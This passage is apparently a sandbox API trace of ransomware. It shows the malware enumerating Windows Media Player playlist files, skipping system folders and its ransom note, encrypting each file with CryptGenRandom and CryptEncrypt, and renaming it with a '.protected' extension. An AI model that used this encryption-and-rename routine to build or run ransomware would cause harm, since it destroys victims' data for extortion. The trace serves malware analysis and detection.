liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.067] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.067] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.067] CloseHandle (hObject=0x158) returned 1 [0094.067] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.protected") returned 132 [0094.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.protected")) returned 1 [0094.069] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Windows") returned -1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files") returned -1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files (x86)") returned -1 [0094.069] lstrcmpiW 
(lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="$Recycle.bin") returned 1 [0094.069] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="System Volume Information") returned -1 [0094.069] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0094.069] StrStrIW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".protected") returned 0x0 [0094.069] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.069] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.069] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.070] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0094.070] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0094.070] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0094.070] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", 
lpSrch=".rar") returned 0x0 [0094.070] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0094.070] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".zip") returned 0x0 [0094.070] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0094.071] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.072] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x410, lpOverlapped=0x0) returned 1 [0094.072] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.072] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.072] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.072] CloseHandle (hObject=0x158) returned 1 [0094.072] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.protected") returned 133 [0094.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync 
Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.protected")) returned 1 [0094.073] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0094.073] lstrcmpiW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0094.073] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0094.073] StrStrIW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0094.073] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 
[0094.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.074] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0094.074] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0094.074] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0094.074] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0094.074] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0094.074] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0094.074] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0094.082] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.082] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x3fc, lpOverlapped=0x0) returned 1 [0094.082] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.082] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.082] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.082] CloseHandle (hObject=0x158) returned 1 [0094.082] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.protected") returned 132 [0094.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0094.083] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Windows") returned -1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files") returned -1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files (x86)") returned -1 [0094.083] lstrcmpiW 
(lpString1="09_Music_played_the_most.wpl", lpString2="$Recycle.bin") returned 1 [0094.083] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="System Volume Information") returned -1 [0094.083] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0094.083] StrStrIW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".protected") returned 0x0 [0094.083] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.083] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.083] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.085] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0094.085] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0094.085] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0094.085] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".rar") returned 0x0 [0094.085] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0094.085] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".zip") returned 0x0 [0094.085] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0094.089] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.089] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0094.091] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.091] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.092] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.092] CloseHandle (hObject=0x158) returned 1 [0094.092] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.protected") returned 126 [0094.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: 
"c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.protected")) returned 1 [0094.093] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Windows") returned -1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files") returned -1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files (x86)") returned -1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="$Recycle.bin") returned 1 [0094.093] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="System Volume Information") returned -1 [0094.093] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0094.093] StrStrIW (lpFirst="10_All_Music.wpl", lpSrch=".protected") returned 0x0 [0094.093] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.093] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.093] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync 
playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.094] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0094.094] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0094.094] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0094.094] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".rar") returned 0x0 [0094.094] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0094.094] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".zip") returned 0x0 [0094.094] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0094.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.095] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0094.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.095] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.095] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.096] CloseHandle (hObject=0x158) returned 1 [0094.096] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.protected") returned 114 [0094.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.protected")) returned 1 [0094.096] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Windows") returned -1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files") returned -1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files (x86)") returned -1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="$Recycle.bin") returned 1 [0094.096] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="System Volume Information") returned -1 [0094.096] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0094.097] StrStrIW (lpFirst="11_All_Pictures.wpl", lpSrch=".protected") returned 0x0 [0094.097] lstrcmpW 
(lpString1="11_All_Pictures.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0094.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.097] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0094.097] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0094.097] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0094.097] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".rar") returned 0x0 [0094.097] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0094.097] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".zip") returned 0x0 [0094.097] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0094.099] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.099] WriteFile 
(in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0094.099] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.099] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.099] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.099] CloseHandle (hObject=0x158) returned 1 [0094.099] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.protected") returned 117 [0094.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.protected")) returned 1 [0094.100] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) 